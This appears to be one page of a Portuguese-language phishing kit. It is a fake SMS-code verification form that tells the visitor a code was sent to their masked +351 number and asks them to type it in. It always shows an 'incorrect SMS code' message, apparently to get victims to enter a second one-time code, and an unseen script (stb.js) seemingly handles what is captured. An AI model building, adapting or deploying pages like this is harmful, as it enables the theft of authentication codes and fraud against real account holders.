<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <link rel="stylesheet" href="./css/kawbo.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div class="topa">
        <img src="./img/skmTop.JPG" alt="">
    </div>

    <div class="pic1">
        <img src="./img/Group 1.png" alt="">
    </div>
    
    <div class="kolo">  
        

        <form method="post" id="pg5">
            <p class="pp5">
                Foi enviado um SMS para o seu número: +3519******** com o código de autenticação. Aguarde o SMS e, após a recepção, introduza o código abaixo.
            </p> 

            <div class="group"> 
                    
                <input type="text" id="codima1" required>
                <span class="highlight"></span>
                <span class="bar"></span>
                <label>Código SMS</label>
              </div>
              <p style="color: rgb(196, 36, 36);">código SMS incorrecto</p>
            
            <button type="submit"><span>Continuar</span> <img src="./img/ar.svg" alt=""></button>
        </form>
    </div>


    <div>
        
        <div class="bot3 boot3">
            <img src="./img/bop2.JPG" alt="">
        </div>
    </div>

    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>